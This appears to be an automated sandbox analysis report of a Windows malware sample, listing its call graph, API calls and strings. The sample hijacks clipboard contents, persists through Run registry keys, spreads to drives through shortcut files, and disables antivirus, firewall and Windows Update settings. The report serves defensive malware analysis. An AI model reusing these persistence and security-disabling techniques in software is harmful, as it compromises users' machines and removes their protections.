ChangeClipboardChain 5882->5885 5883->5875 5884->5880 5885->5876 5886->5887 5889 405a25 GetClipboardData 5886->5889 5887->5875 5888 405ae5 SendMessageA 5887->5888 5888->5875 5889->5875 5890 405a3d GlobalLock 5889->5890 5890->5875 5891 405a55 5890->5891 5892 405a68 5891->5892 5893 405a89 5891->5893 5894 405a9e 5892->5894 5895 405a6e 5892->5895 5896 405630 13 API calls 5893->5896 5911 405750 5894->5911 5897 405a74 GlobalUnlock CloseClipboard 5895->5897 5905 405510 5895->5905 5896->5897 5897->5887 5901 405ac7 5897->5901 5919 4048a0 lstrlenW 5901->5919 5904 40a740 _invalid_parameter 3 API calls 5904->5887 5908 40551b 5905->5908 5906 405521 lstrlenW 5906->5908 5909 405534 5906->5909 5907 40a530 _invalid_parameter 7 API calls 5907->5908 5908->5906 5908->5907 5908->5909 5910 405551 lstrcpynW 5908->5910 5909->5897 5910->5908 5910->5909 5916 40575d 5911->5916 5912 405763 lstrlenA 5912->5916 5917 405776 5912->5917 5913 4055d0 2 API calls 5913->5916 5914 40a530 _invalid_parameter 7 API calls 5914->5916 5916->5912 5916->5913 5916->5914 5916->5917 5918 40a740 _invalid_parameter 3 API calls 5916->5918 5956 405700 5916->5956 5917->5897 5918->5916 5926 4048d4 5919->5926 5920 404d5e StrStrW 5921 404d71 5920->5921 5922 404d75 StrStrW 5920->5922 5921->5922 5924 404d88 5922->5924 5925 404d8c StrStrW 5922->5925 5923 404ae2 5923->5904 5924->5925 5927 404d9f 5925->5927 5926->5923 5930 404c69 StrStrW 5926->5930 5933 404af4 5926->5933 5927->5923 5928 404e09 isalpha 5927->5928 5936 404e43 5927->5936 5928->5927 5929 404e20 isdigit 5928->5929 5929->5923 5929->5927 5931 404c94 StrStrW 5930->5931 5930->5933 5932 404cbf StrStrW 5931->5932 5931->5933 5932->5933 5933->5920 5933->5923 5934 405351 StrStrW 5939 405364 5934->5939 5940 40536b StrStrW 5934->5940 5935 405303 StrStrW 5937 405316 5935->5937 5938 40531d StrStrW 5935->5938 5936->5934 5936->5935 5937->5938 5941 405330 5938->5941 5942 405337 StrStrW 5938->5942 5939->5940 5943 405385 StrStrW 5940->5943 5944 40537e 5940->5944 5941->5942 5942->5934 5947 40534a 5942->5947 5945 405398 5943->5945 5946 40539f StrStrW 5943->5946 5944->5943 5945->5946 5948 4053b2 5946->5948 5949 4053b9 StrStrW 5946->5949 5947->5934 5948->5949 5950 4053cc lstrlenA 5949->5950 5950->5923 5952 405492 GlobalAlloc 5950->5952 5952->5923 5953 4054ad GlobalLock 5952->5953 5953->5923 5954 4054c0 memcpy GlobalUnlock OpenClipboard 5953->5954 5954->5923 5955 4054ed EmptyClipboard SetClipboardData CloseClipboard 5954->5955 5955->5923 5957 40570b 5956->5957 5958 405711 lstrlenA 5957->5958 5959 4055d0 2 API calls 5957->5959 5960 405744 5957->5960 5958->5957 5959->5957 5960->5916 5640 4080d9 5641 4080e2 5640->5641 5642 4080f1 34 API calls 5641->5642 5643 408f26 5641->5643 5973 405f1d 5975 405eb1 5973->5975 5974 405f1b 5976 40a740 _invalid_parameter 3 API calls 5974->5976 5975->5974 5978 405f06 memcpy 5975->5978 5977 405f28 LeaveCriticalSection 5976->5977 5978->5974 5980 40a81e 5981 40a740 _invalid_parameter 3 API calls 5980->5981 5982 40a7dd 5981->5982 5983 40a530 _invalid_parameter 7 API calls 5982->5983 5984 40a7f2 5982->5984 5985 40a7f4 memcpy 5982->5985 5983->5982 5985->5982 5644 40d660 5649 401b60 5644->5649 5646 40d675 5647 40d694 5646->5647 5648 401b60 16 API calls 5646->5648 5648->5647 5650 401c42 5649->5650 5651 401b70 5649->5651 5650->5646 5651->5650 5652 40a320 7 API calls 5651->5652 5653 401b9d 5652->5653 5653->5650 5654 40a7b0 8 API calls 5653->5654 5655 401bc9 5654->5655 5656 401be6 5655->5656 5657 401bd6 5655->5657 5659 401ae0 4 API calls 5656->5659 5658 40a740 _invalid_parameter 3 API calls 5657->5658 5660 401bdc 5658->5660 5661 401bf3 5659->5661 5660->5646 5662 401c33 5661->5662 5663 401bfc EnterCriticalSection 5661->5663 5666 40a740 _invalid_parameter 3 API calls 5662->5666 5664 401c13 5663->5664 5665 401c1f LeaveCriticalSection 5663->5665 5664->5665 5665->5646 5667 401c3c 5666->5667 5668 40a740 _invalid_parameter 3 API calls 5667->5668 5668->5650 5669 40da60 5670 40bb00 194 API calls 5669->5670 5671 40da98 5670->5671 5672 40dae0 5682 4013b0 5672->5682 5674 40daed 5675 40b790 5 API calls 5674->5675 5676 40db07 InterlockedExchangeAdd 5674->5676 5677 40db4b WaitForSingleObject 5674->5677 5679 40bab0 13 API calls 5674->5679 5681 40db6d 5674->5681 5675->5674 5676->5674 5676->5677 5677->5674 5678 40db64 5677->5678 5694 401330 5678->5694 5679->5674 5683 40a320 7 API calls 5682->5683 5684 4013bb CreateEventA socket 5683->5684 5685 4013f2 5684->5685 5686 4013f8 5684->5686 5687 401330 8 API calls 5685->5687 5688 401401 bind 5686->5688 5689 401462 5686->5689 5687->5686 5690 401444 CreateThread 5688->5690 5691 401434 5688->5691 5689->5674 5690->5689 5704 401100 5690->5704 5692 401330 8 API calls 5691->5692 5693 40143a 5692->5693 5693->5674 5695 401339 5694->5695 5696 40139b 5694->5696 5695->5696 5697 401341 SetEvent WaitForSingleObject CloseHandle 5695->5697 5696->5681 5698 40138b 5697->5698 5702 401369 5697->5702 5733 40b0d0 shutdown closesocket 5698->5733 5700 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5700->5702 5701 401395 5703 40a740 _invalid_parameter 3 API calls 5701->5703 5702->5698 5702->5700 5703->5696 5705 401115 ioctlsocket 5704->5705 5706 4011e4 5705->5706 5712 40113a 5705->5712 5707 40a740 _invalid_parameter 3 API calls 5706->5707 5709 4011ea 5707->5709 5708 4011cd WaitForSingleObject 5708->5705 5708->5706 5710 40a570 9 API calls 5710->5712 5711 401168 recvfrom 5711->5708 5711->5712 5712->5708 5712->5710 5712->5711 5713 4011ad InterlockedExchangeAdd 5712->5713 5715 401000 5713->5715 5716 401014 5715->5716 5717 40103b 5716->5717 5718 40a320 7 API calls 5716->5718 5726 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5717->5726 5718->5717 5720 40105b 5727 401580 5720->5727 5722 4010ec 5722->5712 5723 401071 5723->5722 5724 4010a3 IsBadReadPtr 5723->5724 5725 4010d8 memmove 5723->5725 5724->5723 5725->5723 5726->5720 5728 401592 5727->5728 5729 4015a5 memcpy 5727->5729 5730 40a570 9 API calls 5728->5730 5731 4015c1 5729->5731 5732 40159f 5730->5732 5731->5723 5732->5729 5733->5701 5734 40d4e0 5735 40d54e 5734->5735 5736 40d4f6 5734->5736 5736->5735 5737 40d500 5736->5737 5738 40d553 5736->5738 5739 40d5a3 5736->5739 5740 40a320 7 API calls 5737->5740 5742 40d578 5738->5742 5743 40d56b InterlockedDecrement 5738->5743 5768 40c150 5739->5768 5744 40d50d 5740->5744 5746 40a740 _invalid_parameter 3 API calls 5742->5746 5743->5742 5757 4023d0 5744->5757 5745 40d5c9 5745->5735 5755 40d601 IsBadReadPtr 5745->5755 5756 40bb00 194 API calls 5745->5756 5773 40c250 5745->5773 5748 40d584 5746->5748 5749 40a740 _invalid_parameter 3 API calls 5748->5749 5749->5735 5753 40d53b InterlockedIncrement 5753->5735 5755->5745 5756->5745 5758 402413 5757->5758 5759 4023d9 5757->5759 5761 40b2d0 5758->5761 5759->5758 5760 4023ea InterlockedIncrement 5759->5760 5760->5758 5762 40b360 2 API calls 5761->5762 5763 40b2df 5762->5763 5764 40b2e9 5763->5764 5765 40b2ed EnterCriticalSection 5763->5765 5764->5735 5764->5753 5766 40b30c LeaveCriticalSection 5765->5766 5766->5764 5769 40c163 5768->5769 5770 40c18d memcpy 5768->5770 5771 40a570 9 API calls 5769->5771 5770->5745 5772 40c184 5771->5772 5772->5770 5774 40c279 5773->5774 5775 40c26e 5773->5775 5774->5775 5776 40c291 memmove 5774->5776 5775->5745 5776->5775 5986 40d020 5987 40b2d0 4 API calls 5986->5987 5988 40d033 5987->5988 5989 40d060 208 API calls 5988->5989 5990 40d04a 5988->5990 5989->5990 5991 401920 GetTickCount WaitForSingleObject 5992 401ac9 5991->5992 5993 40194d WSAWaitForMultipleEvents 5991->5993 5994 4019f0 GetTickCount 5993->5994 5995 40196a WSAEnumNetworkEvents 5993->5995 5996 401a43 GetTickCount 5994->5996 5997 401a05 EnterCriticalSection 5994->5997 5995->5994 6011 401983 5995->6011 5998 401ab5 WaitForSingleObject 5996->5998 5999 401a4e EnterCriticalSection 5996->5999 6000 401a16 5997->6000 6001 401a3a LeaveCriticalSection 5997->6001 5998->5992 5998->5993 6003 401aa1 LeaveCriticalSection GetTickCount 5999->6003 6004 401a5f InterlockedExchangeAdd 5999->6004 6005 401a29 LeaveCriticalSection 6000->6005 6033 401820 6000->6033 6001->5998 6002 401992 accept 6002->5994 6002->6011 6003->5998 6051 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6004->6051 6005->5998 6009 401a72 6009->6003 6009->6004 6052 40b0d0 shutdown closesocket 6009->6052 6011->5994 6011->6002 6012 401cf0 7 API calls 6011->6012 6013 4022c0 6011->6013 6012->5994 6014 4022d2 EnterCriticalSection 6013->6014 6015 4022cd 6013->6015 6016 4022e7 6014->6016 6017 4022fd LeaveCriticalSection 6014->6017 6015->6011 6016->6017 6018 402308 6017->6018 6019 40230f 6017->6019 6018->6011 6020 40a320 7 API calls 6019->6020 6021 402319 6020->6021 6022 402326 getpeername CreateIoCompletionPort 6021->6022 6023 4023b8 6021->6023 6025 4023b2 6022->6025 6026 402366 6022->6026 6055 40b0d0 shutdown closesocket 6023->6055 6029 40a740 _invalid_parameter 3 API calls 6025->6029 6053 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6026->6053 6027 4023c3 6027->6011 6029->6023 6030 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6054 4021e0 EnterCriticalSection LeaveCriticalSection 6030->6054 6032 4023ab 6032->6011 6034 40190f 6033->6034 6035 401830 6033->6035 6034->6001 6035->6034 6036 40183d InterlockedExchangeAdd 6035->6036 6036->6034 6042 401854 6036->6042 6037 401880 6038 401891 6037->6038 6065 40b0d0 shutdown closesocket 6037->6065 6040 4018a7 InterlockedDecrement 6038->6040 6043 401901 6038->6043 6040->6043 6042->6034 6042->6037 6056 4017a0 EnterCriticalSection 6042->6056 6044 402247 6043->6044 6045 402265 EnterCriticalSection 6043->6045 6044->6001 6046 40229c LeaveCriticalSection DeleteCriticalSection 6045->6046 6049 40227d 6045->6049 6047 40a740 _invalid_parameter 3 API calls 6046->6047 6047->6044 6048 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6048->6049 6049->6048 6050 40229b 6049->6050 6050->6046 6051->6009 6052->6009 6053->6030 6054->6032 6055->6027 6057 401807 LeaveCriticalSection 6056->6057 6058 4017ba InterlockedExchangeAdd 6056->6058 6057->6042 6059 4017ca LeaveCriticalSection 6058->6059 6060 4017d9 6058->6060 6059->6042 6061 40a740 _invalid_parameter 3 API calls 6060->6061 6062 4017fe 6061->6062 6063 40a740 _invalid_parameter 3 API calls 6062->6063 6064 401804 6063->6064 6064->6057 6065->6038 5777 405fe5 5778 405f5e 5777->5778 5779 405fea LeaveCriticalSection 5778->5779 5780 40a7b0 8 API calls 5778->5780 5781 405fbc 5780->5781 5781->5779 6066 406ba6 6069 406b88 6066->6069 6067 406cc8 Sleep 6067->6069 6068 406bb9 6070 406260 4 API calls 6068->6070 6069->6067 6069->6068 6071 406cd8 ExitThread 6069->6071 6073 406340 4 API calls 6069->6073 6072 406bca 6070->6072 6074 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6072->6074 6077 406beb 6072->6077 6073->6069 6075 406c66 wsprintfW 6074->6075 6076 406c7b wsprintfW 6074->6076 6075->6076 6078 406650 51 API calls 6076->6078 6078->6077 6079 40f42c 6080 40f434 6079->6080 6081 40f4e8 6080->6081 6085 40f669 6080->6085 6084 40f46d 6084->6081 6089 40f554 RtlUnwind 6084->6089 6086 40f67e 6085->6086 6088 40f69a 6085->6088 6087 40f709 NtQueryVirtualMemory 6086->6087 6086->6088 6087->6088 6088->6084 6090 40f56c 6089->6090 6090->6084 6091 40dab0 6094 401200 6091->6094 6093 40dad2 6095 401314 6094->6095 6096 40121d 6094->6096 6095->6093 6096->6095 6097 40a530 _invalid_parameter 7 API calls 6096->6097 6098 401247 memcpy htons 6097->6098 6099 4012ed 6098->6099 6100 401297 sendto 6098->6100 6103 40a740 _invalid_parameter 3 API calls 6099->6103 6101 4012b6 InterlockedExchangeAdd 6100->6101 6102 4012e9 6100->6102 6101->6100 6104 4012cc 6101->6104 6102->6099 6105 40130a 6102->6105 6106 4012fc 6103->6106 6108 40a740 _invalid_parameter 3 API calls 6104->6108 6107 40a740 _invalid_parameter 3 API calls 6105->6107 6106->6093 6107->6095 6109 4012db 6108->6109 6109->6093 6110 40b9b0 6111 40b9b3 WaitForSingleObject 6110->6111 6112 40b9e1 6111->6112 6113 40b9cb InterlockedDecrement 6111->6113 6114 40b9da 6113->6114 6114->6111 6115 40b0f0 16 API calls 6114->6115 6115->6114 5796 4074f1 ExitThread 6116 40e6b1 6118 40e6ba 6116->6118 6117 40e7ad 6118->6117 6119 40e723 lstrcmpiW 6118->6119 6120 40e7a3 SysFreeString 6119->6120 6121 40e736 6119->6121 6120->6117 6122 40e4a0 2 API calls 6121->6122 6124 40e744 6122->6124 6123 40e795 6123->6120 6124->6120 6124->6123 6125 40e773 lstrcmpiW 6124->6125 6126 40e785 6125->6126 6127 40e78b SysFreeString 6125->6127 6126->6127 6127->6123 6128 40f434 6129 40f452 6128->6129 6130 40f4e8 6128->6130 6131 40f669 NtQueryVirtualMemory 6129->6131 6133 40f46d 6131->6133 6132 40f554 RtlUnwind 6132->6133 6133->6130 6133->6132

                                              Executed Functions

                                              Function 00407500 Relevance: 287.8, APIs: 108, Strings: 56, Instructions: 784sleepfilesynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ecc0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 11 4075f0-4075f2 ExitProcess 3->11 12 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->12 6 407902-407922 RegOpenKeyExW 4->6 7 4078d6-4078fc RegSetValueExA RegCloseKey 4->7 9 407950-407970 RegOpenKeyExW 6->9 10 407924-40794a RegSetValueExA RegCloseKey 6->10 7->6 13 407972-407998 RegSetValueExA RegCloseKey 9->13 14 40799e-4079be RegOpenKeyExW 9->14 10->9 15 40764c-40767b SetFileAttributesW RegOpenKeyExW 12->15 16 4076de-407720 Sleep wsprintfW CopyFileW 12->16 13->14 17 4079c0-4079e6 RegSetValueExA RegCloseKey 14->17 18 4079ec-407a0c RegOpenKeyExW 14->18 15->16 21 40767d-4076b0 wcslen RegSetValueExW 15->21 22 407726-407755 SetFileAttributesW RegOpenKeyExW 16->22 23 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 16->23 17->18 19 407a0e-407a3a RegSetValueExA RegCloseKey 18->19 20 407a3f-407a5f RegOpenKeyExW 18->20 24 407ae4-407b04 RegOpenKeyExW 19->24 26 407a61-407a90 RegCreateKeyExW RegCloseKey 20->26 27 407a96-407ab6 RegOpenKeyExW 20->27 21->16 28 4076b2-4076d4 RegCloseKey call 40ef10 21->28 22->23 29 407757-40778a wcslen RegSetValueExW 22->29 23->4 25 407817-407846 SetFileAttributesW RegOpenKeyExW 23->25 32 407b06-407b32 RegSetValueExA RegCloseKey 24->32 33 407b37-407b57 RegOpenKeyExW 24->33 25->4 30 407848-40787b wcslen RegSetValueExW 25->30 26->27 27->24 31 407ab8-407ade RegSetValueExA RegCloseKey 27->31 28->16 43 4076d6-4076d8 ExitProcess 28->43 29->23 35 40778c-4077ae RegCloseKey call 40ef10 29->35 30->4 36 40787d-40789f RegCloseKey call 40ef10 30->36 31->24 37 407c33-407c53 RegOpenKeyExW 32->37 39 407b59-407b88 RegCreateKeyExW RegCloseKey 33->39 40 407b8e-407bae RegOpenKeyExW 33->40 35->23 49 4077b0-4077b2 ExitProcess 35->49 36->4 56 4078a1-4078a3 ExitProcess 36->56 46 407c81-407ca1 RegOpenKeyExW 37->46 47 407c55-407c7b RegSetValueExA RegCloseKey 37->47 39->40 44 407bb0-407bdf RegCreateKeyExW RegCloseKey 40->44 45 407be5-407c05 RegOpenKeyExW 40->45 44->45 45->37 53 407c07-407c2d RegSetValueExA RegCloseKey 45->53 50 407ca3-407cc9 RegSetValueExA RegCloseKey 46->50 51 407ccf-407cef RegOpenKeyExA 46->51 47->46 50->51 54 407cf5-407dd5 RegSetValueExA * 7 RegCloseKey 51->54 55 407ddb-407dfb RegOpenKeyExA 51->55 53->37 54->55 57 407e01-407ee1 RegSetValueExA * 7 RegCloseKey 55->57 58 407ee7-407efc Sleep call 40cd60 55->58 57->58 61 408071-40807a 58->61 62 407f02-40806e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40dbd0 call 406f70 CreateEventA call 40c490 call 40d6c0 call 40b850 call 40d6f0 * 4 call 40d860 call 40d9a0 58->62 62->61
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNELBASE(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,00417B18,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(00417B18), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNEL32(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-2064808860
                                              • Opcode ID: dacd91aba6d53fbcaf56ddf06e648a3a217ce3490dd00242cf583643d0613e04
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: dacd91aba6d53fbcaf56ddf06e648a3a217ce3490dd00242cf583643d0613e04
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D

                                              Non-executed Functions

                                              Function 00406650 Relevance: 77.3, APIs: 34, Strings: 10, Instructions: 300fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 89 406650-406665 _chkstk 90 406667-406669 89->90 91 40666e-406720 wsprintfW * 5 PathFileExistsW 89->91 92 406b48-406b4b 90->92 93 406722-406743 call 40ed00 91->93 94 406764-406773 PathFileExistsW 91->94 93->94 107 406745-40675e SetFileAttributesW DeleteFileW 93->107 96 406803-406812 PathFileExistsW 94->96 97 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 94->97 100 406814-40681a 96->100 101 406859-40687a FindFirstFileW 96->101 98 4067a9-4067ba CreateDirectoryW 97->98 99 4067cb-4067da PathFileExistsW 97->99 98->99 103 4067bc-4067c5 SetFileAttributesW 98->103 99->96 104 4067dc-4067f2 CopyFileW 99->104 105 406834-406847 call 406400 100->105 106 40681c-406832 call 406400 100->106 108 406880-406938 101->108 109 406b42 101->109 103->99 104->96 111 4067f4-4067fd SetFileAttributesW 104->111 120 40684a-406853 SetFileAttributesW 105->120 106->120 107->94 110 406942-406956 lstrcmpW 108->110 109->92 114 406958-40696c lstrcmpW 110->114 115 40696e 110->115 111->96 114->115 118 406973-406984 114->118 119 406b19-406b2f FindNextFileW 115->119 121 406995-40699c 118->121 119->110 122 406b35-406b3c FindClose 119->122 120->101 123 4069ca-4069d3 121->123 124 40699e-4069bb lstrcmpiW 121->124 122->109 127 4069d5 123->127 128 4069da-4069eb 123->128 125 4069bd 124->125 126 4069bf-4069c6 124->126 125->121 126->123 127->119 130 4069fc-406a03 128->130 131 406a73-406a7c 130->131 132 406a05-406a22 PathMatchSpecW 130->132 133 406a83-406a92 PathFileExistsW 131->133 134 406a7e 131->134 135 406a24 132->135 136 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 132->136 138 406a94 133->138 139 406a99-406ae9 wsprintfW * 2 133->139 134->119 135->130 136->131 138->119 140 406b03-406b13 MoveFileExW 139->140 141 406aeb-406b01 call 406510 139->141 140->119 141->119
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(00417500,?,00000000), ref: 004067EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-3006713477
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Opcode Fuzzy Hash: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59
                                              Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 694 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 695 406565-406579 lstrcmpW 694->695 696 40663f-406642 694->696 697 406591 695->697 698 40657b-40658f lstrcmpW 695->698 700 40660c-406622 FindNextFileW 697->700 698->697 699 406593-4065dc wsprintfW * 2 698->699 701 4065f6-406606 MoveFileExW 699->701 702 4065de-4065f4 call 406510 699->702 700->695 703 406628-406639 FindClose RemoveDirectoryW 700->703 701->700 702->700 703->696
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Opcode Fuzzy Hash: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
